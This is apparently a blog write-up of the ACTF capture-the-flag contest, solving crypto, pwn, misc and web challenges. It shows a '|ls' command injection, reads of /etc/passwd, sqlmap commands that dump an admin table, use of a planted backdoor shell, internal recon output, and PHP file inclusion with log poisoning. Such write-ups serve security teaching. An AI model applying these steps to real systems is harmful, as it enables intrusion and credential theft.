说好的逆向题呢?
出题人还没吃早饭呢,你们急什么。出门左转,乖乖做Web题,OK不?
Flag:OK
本题flag不在ACTF{}中
oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?
替换密码
git clone https://github.com/alexbers/substitution_cipher_solver.git
cd cd substitution_cipher_solver/
cat "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?" > encrypted.txt
./decrypt.py
Best key: ervglxyzohiqdsnbamfjpwkutc, bad_words 2
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?
FLAG:cryptooosocoolamiright
nc 218.2.197.236 2009
crypto200.tar.gz

栈溢出,覆盖执行game函数地址

听说参加ACTF的屌丝都喜欢上贴吧:)
贴吧,全吧搜索ACTF,发现test帐号发出的Flag,当然,后来做题可能就要苦逼些;-)

少年,不来一发么。http://218.2.197.236:2005/index.php
打开链接,提示Can you GET the way to flag?
查看源码,发现:
<!--way = "H4ck_F0r_Fun!GoGoGo!" -->
So,http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
买不到TI4的门票觉得人生好灰暗。。crypto200.tar.gz
参考有过类似题目的CTF,写脚本,解出Key
http://v0ids3curity.blogspot.com/2014/01/hack-you-ctf-2014-crypto-100-easy-one.html
得到的Key:DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo
去掉重复,为DoNotTryToGuessWhatDoesD3AdCa7ThinkOf
解出enc2的明文:
High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
nc 218.2.197.236 2010 crypto200.tar.gz
程序拉进IDA里分析,会发现可识别四个指令:
killPig (注意有个空格)

如果输入该指令,那么程序首先分配一8字节的内存空间,把地址放在cs:auth中。然后判断killPig 后面字符串的长度是否超过0x1E字节,如果不超过就把killPig 后面8字节字符串内容复制进去,超过就跳过该处理。
reset

把cs:auth所存地址free
feedPig

新申请一块内存放置feedPig后面字符串,地址放在cs:service里
EatIt

很明显是取得key的指令了。但是它前面有个判断,如果cs:auth所存地址+0x20有内容,则回显key,否则跳过。
分析可知要点是让cs:auth所存地址+0x20有内容。
直接killPig +字符串不行,有长度限制。
出题人可能是要先killPig,reset把刚才申请的内存free掉,然后在feedPig重新利用那块地址,输入超过0x20字节的字符串达到目的。
但后来试了下只要killPig后面feedPIg,就会在第一个内存地址+0x20的地方重新分配内存,达到目的;-)

FLAG在admin的手里!http://218.2.197.236:2005/web200/index.php
开始题目有Bug,任意用户密码得到返回页面

返回Header头,发现Real地址,访问。只有管理员有,修改Cookie,admin=1

得到Flag

因为题目开始有Bug,起初跑偏,一直把重点放在登陆框的注入上,但是web100.admin表的username和password都没能跑出来数据,后来官方修补此Bug。
用比较费力的方法枚举,由于时间限制,Burp发包保持32s左右一次的频率,枚举出Flag
int main(int argc, char **argv, char *i)
{
return i=*++argv, i=i+0, *i - 'A';
}
ACTF{c6e49c9b897cc4dba15b39ec53bd8fd681937b8ae16833a24090f27d71d3f8c5}
管理员小陆搭了个服务器,但是好像漏洞蛮多哟。
http://218.2.197.236:2001/index.html
起初没发现什么信息,后来在About终于看到一个小小的:
This doubi web blog layout is provided by ./bc
访问bc目录,某链接存在任意文件读取,但过滤了..
<?php
$url=$_GET['uuu'];
$url=str_replace("..","",$url);
$file = fopen("$url", "r") or exit("Unable to open file!");
//Output a line of the file until the end is reached
while(!feof($file)) {
echo fgets($file)."
";
}
fclose($file);
?>
读/etc/passwd发现HINT:x:500:500::/usr/share/ngInx/html:/bin/bash,得以读取网站目录login.php

login.php存在类似SRUN3000命令执行,?gongwan=1|ls > /tmp/x,列出目录

读取DBINFO得到flag
<?php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session
$dbhost = "localhost";
$dbname = "FLAG"; // mysql database name
$dbuser = "FLAG"; // mysql database username
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password
$pre = "onecms_"; // prefix for onecms tables
?>
老大哥aay给了你一个神秘文件,你看着办吧flag.rar
一个加密的RAR文件,能看到每个文件大小为5,且有CRC值

将ACTF{保存为1.txt后加密压缩,发现CRC相同,确定思路,暴力枚举CRC
#include <windows.h>
#include <stdio.h>
//crc32.h
#ifndef _CRC32_H
#define _CRC32_H
UINT crc32( UCHAR *buf, int len);
#endif
static UINT CRC32[256];
static char init = 0;
//初始化表
static void init_table()
{
int i,j;
UINT crc;
for(i = 0;i < 256;i++)
{
crc = i;
for(j = 0;j < 8;j++)
{
if(crc & 1)
{
crc = (crc >> 1) ^ 0xEDB88320;
}
else
{
crc = crc >> 1;
}
}
CRC32[i] = crc;
}
}
//crc32实现函数
UINT crc32( UCHAR *buf, int len)
{
UINT ret = 0xFFFFFFFF;
int i;
if( !init )
{
init_table();
init = 1;
}
for(i = 0; i < len;i++)
{
ret = CRC32[((ret & 0xFF) ^ buf[i])] ^ (ret >> 8);
}
ret = ~ret;
return ret;
}
int main()
{
char ss[]="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
char sss[6]={0};
int a,b,c,d,e;
int _crc32 = 0;
for(a=0; a<strlen(ss); a++)
{
for(b=0; b<strlen(ss); b++)
{
for(c=0; c<strlen(ss); c++)
{
for(d=0; d<strlen(ss); d++)
{
for(e=0; e<strlen(ss); e++)
{
sss[0] = ss[a];
sss[1] = ss[b];
sss[2] = ss[c];
sss[3] = ss[d];
sss[4] = ss[e];
_crc32 = crc32((UCHAR *)sss, 5);
if(_crc32 == 0xCA2AA4DE)
{
printf("%s\n", sss);
system("PAUSE");
}
}
}
}
}
}
return 0;
}
CRC存在碰撞,好在根据语意可确定最后Flag
你大家快来看赞助商!hidden.png
下载图片后ps处理下,二维码的形状已经很清晰了,对比官网图片,除却二维码像素相同,python对比生成二维码

二维码为Version3 29*29,二维码三角即可,但此图片右下角仍缺少一行一列,有2^17种可能
当时真的生成了这17w二维码文件并使用脚本批量扫描,由于脚本的原因没有得到扫描结果,在此过程中学习二维码结构
结构参考:http://en.wikipedia.org/wiki/QR_code
右下角有一个位置确认标志,不影响扫描数据,可设置为黑(1),排除9点,剩下2^8即256种可能,批量生成:
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import string
from PIL import Image
def showQRCode(fpath,bit,a):
bmp = Image.open(fpath)
bmp2 = Image.open('logo.jpg')
pix = bmp.load()
pix2 = bmp2.load()
w, h = bmp.size
w2, h2 = bmp2.size
i=0
for x in xrange(0, w):
for y in xrange(0, h):
if pix[x,y] == pix2[x,y]:
pix[x,y] = (255,255,255)
else:
pix[x,y] = (0,0,0)
if (x ==21 and y>=21 and y<=25) or (x>=21 and x<=25 and y==21 ):
pix[x, y] = (0, 0, 0)
if (x ==21 and y>=26 and y<=29) or (x>=26 and x<=29 and y==21 ):
if int(bit[i])==0:
pix[x, y] = (255, 255, 255)
else:
pix[x, y] = (0, 0, 0)
i+=1
bmp.save('test'+a+'.png')
if __name__ == "__main__":
for a in open('passdic.list','rU'):
a=a.rstrip()
flagHex = showQRCode("hidden.png",a,a)
后批量识别又没有收获,此时也是凌晨,就拿起SmartPhone无力的挨个扫,一遍过去,没结果,又来一遍,终于在肌无力时扫了出来!如果直接测试找个可靠的识别脚本批量处理会更好。
识别的文件为test11010100

web300没做出来的话这题做出来的希望不大,你以为你是可爱的贡丸酱么( つ•̀ω•́)つ
(贡丸酱到底算不算提示呢)
(web300和web400都不需要使用扫描器)
(本题flag并不是ACTF形式的,你提交的flag中也不需要包含任何形式的括号)
http://218.2.197.236:2003
现在可以公开的情报:
管理员是个很懒的人,他的笔记几乎没有任何废话。
根据提示,通过web300的命令执行&文件读取发现这样的笔记

访问Web400此地址

根据笔记信息基本可以存在injection,根据这页面的样子又一次跑偏到Mangodb上,经过艰苦的过程终于想到那个Base4不是告诉我们gw,而是提示注入!--
sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1
sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 -D raw_admin -T admin --dump
Database: raw_admin
Table: admin
[3 entries]
+--------------------+-----------------+
| login | password |
+--------------------+-----------------+
| gw | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288 |
| luyuhaoxiaodaibi | luyuhaodadaibi |
+--------------------+-----------------+
跑出这些信息,知906239288为笔记中的女神。
百度发现http://www.baidu.com/p/%E8%92%B2%E8%91%B5%E9%A6%99%E7%AF%86301?from=zhidao,无甚收获
微博有信息

故,后门:http://218.2.197.236:2003/Fuckingluyuhao.php 密码wangbiyun
alias后门,可能放到/var/tmp/下

得到Flag
管理员小陆搭的服务器被人日穿了(见web300),小陆被boss骂了个狗血淋头。然后boss勒令小陆再搭一遍,小陆在某内网换了个架构(原架构是nginx)又搭了一遍web300的站,修补了部分漏洞。boss和小陆都是那台服务器的用户,这样boss发现小陆又写出漏洞代码就会及时记录在服务器上。
接受挑战,hackers,日穿这台位置未知的内网服务器!!!
(本题和之前的web题有紧密联系!!!)
(部分关键文件每十分钟重置一次!!!)
(本题flag不包含有ACTF字样,不包含有任何括号!!!)
(Drink All The Booze , Hack All The Things!!!)
第一步先确定服务器位置
根据提示,可以猜到和WEB300有关
依靠WEB300漏洞,整理WEB300服务器信息如下
Linux gamebox 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
eth0 Link encap:Ethernet HWaddr 00:0C:29:7A:61:32
inet addr:172.17.1.2 Bcast:172.17.1.7 Mask:255.255.255.248
inet6 addr: fe80::20c:29ff:fe7a:6132/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8322561 errors:0 dropped:0 overruns:0 frame:0
TX packets:7889370 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:969748319 (924.8 MiB) TX bytes:9273711147 (8.6 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:13053905 errors:0 dropped:0 overruns:0 frame:0
TX packets:13053905 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:41653303424 (38.7 GiB) TX bytes:41653303424 (38.7 GiB)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 2130/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:55129 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN 515/php-fpm
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 :::51855 :::* LISTEN -
tcp 0 0 :::111 :::* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 ::1:631 :::* LISTEN -
tcp 0 0 ::1:25 :::* LISTEN -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:636 0.0.0.0:* -
udp 0 0 0.0.0.0:895 0.0.0.0:* -
udp 0 0 0.0.0.0:45324 0.0.0.0:* -
udp 0 0 0.0.0.0:914 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 :::111 :::* -
udp 0 0 :::37369 :::* -
udp 0 0 :::895 :::* -
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 -
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 -
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 -
raw 0 1080 0.0.0.0:1 0.0.0.0:* 7 -
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 -
Active UNIX domain sockets (only servers)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 11013 - @/var/run/hald/dbus-J7oPQkOOJW
unix 2 [ ACC ] STREAM LISTENING 10583 - /var/run/rpcbind.sock
unix 2 [ ACC ] STREAM LISTENING 7281 - @/com/ubuntu/upstart
unix 2 [ ACC ] STREAM LISTENING 10856 - /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 10917 - /var/run/cups/cups.sock
unix 2 [ ACC ] STREAM LISTENING 10977 - /var/run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 12567 - public/cleanup
unix 2 [ ACC ] STREAM LISTENING 11008 - @/var/run/hald/dbus-6ghIWFnai8
unix 2 [ ACC ] STREAM LISTENING 12574 - private/tlsmgr
unix 2 [ ACC ] STREAM LISTENING 12578 - private/rewrite
unix 2 [ ACC ] STREAM LISTENING 12582 - private/bounce
unix 2 [ ACC ] STREAM LISTENING 12586 - private/defer
unix 2 [ ACC ] STREAM LISTENING 12590 - private/trace
unix 2 [ ACC ] STREAM LISTENING 12594 - private/verify
unix 2 [ ACC ] STREAM LISTENING 12598 - public/flush
unix 2 [ ACC ] STREAM LISTENING 12602 - private/proxymap
unix 2 [ ACC ] STREAM LISTENING 12606 - private/proxywrite
unix 2 [ ACC ] STREAM LISTENING 12610 - private/smtp
unix 2 [ ACC ] STREAM LISTENING 12614 - private/relay
unix 2 [ ACC ] STREAM LISTENING 12618 - public/showq
unix 2 [ ACC ] STREAM LISTENING 12622 - private/error
unix 2 [ ACC ] STREAM LISTENING 12626 - private/retry
unix 2 [ ACC ] STREAM LISTENING 12630 - private/discard
unix 2 [ ACC ] STREAM LISTENING 12634 - private/local
unix 2 [ ACC ] STREAM LISTENING 12638 - private/virtual
unix 2 [ ACC ] STREAM LISTENING 12642 - private/lmtp
unix 2 [ ACC ] STREAM LISTENING 12646 - private/anvil
unix 2 [ ACC ] STREAM LISTENING 12650 - private/scache
unix 2 [ ACC ] STREAM LISTENING 12346 - /var/lib/mysql/mysql.sock
unix 2 [ ACC ] STREAM LISTENING 12725 - /var/run/abrt/abrt.socket
root pts/2 zhutou-centos-1- Sun Apr 6 01:34 - 01:34 (00:00)
root pts/1 222.205.110.239 Sat Apr 5 12:53 still logged in
root pts/1 222.205.110.239 Sat Apr 5 12:12 - 12:13 (00:01)
root pts/1 222.205.110.239 Sat Apr 5 12:09 - 12:11 (00:01)
root pts/0 zhutou-centos-1- Sat Apr 5 12:07 - 17:16 (05:08)
root pts/0 222.205.110.239 Sat Apr 5 10:07 - 10:08 (00:01)
reboot system boot 2.6.32-431.el6.x Sat Apr 5 09:36 - 02:19 (16:42)
ARP -e
Address HWtype HWaddress Flags Mask Iface
zhutou-centos-1-gw ether 00:0c:29:03:c2:e2 C eth0
zhutou-centos-2 ether 00:0c:29:b6:4e:b8 C eth0
172.17.1.5 (incomplete) eth0
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
172.17.1.0 * 255.255.255.248 U 0 0 0 eth0
link-local * 255.255.0.0 U 1002 0 0 eth0
default zhutou-centos-1 0.0.0.0 UG 0 0 0 eth0
基本可确定zhutou-centos-2就是目标机器,ping -c 4 zhutou-centos-2 得到ip为172.17.1.3
PING zhutou-centos-2 (172.17.1.3) 56(84) bytes of data.
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=1 ttl=64 time=0.153 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=2 ttl=64 time=0.166 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=3 ttl=64 time=0.192 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=4 ttl=64 time=0.170 ms
通过curl命令访问172.17.1.3上的任意文件读取,漏洞依然存在,但命令执行已被删除。做此题时相对较晚,重定向到/tmp目录的临时文件总被脚本删除,浪费了些许时间。
因架构换为Apache,继续收集信息
查看access.log历史记录,提取出fuckti0n.php请求,读取文件内容
<?php
if ($_GET[page]) {
include $_GET[page];
} else {
include "home.php";
}
?>
一个任意文件包含,看看php.ini
disable_functions =
allow_url_fopen = On
allow_url_include = Off
不能远程包含文件。查看/etc/passwd,多了一行
boss:x:500:500::/var/www/boss:/bin/bash
可以猜到flag应该在boss目录下,但需要命令执行才能ls到,此时可影响的文件只有日志,故借助日志构造命令执行并由fuckti0n.php包含执行

列出目录后读取文件内容


CX是何方女神,fxxk`
其他题目未能解出,坐等WannaBe
From Le4F'Blog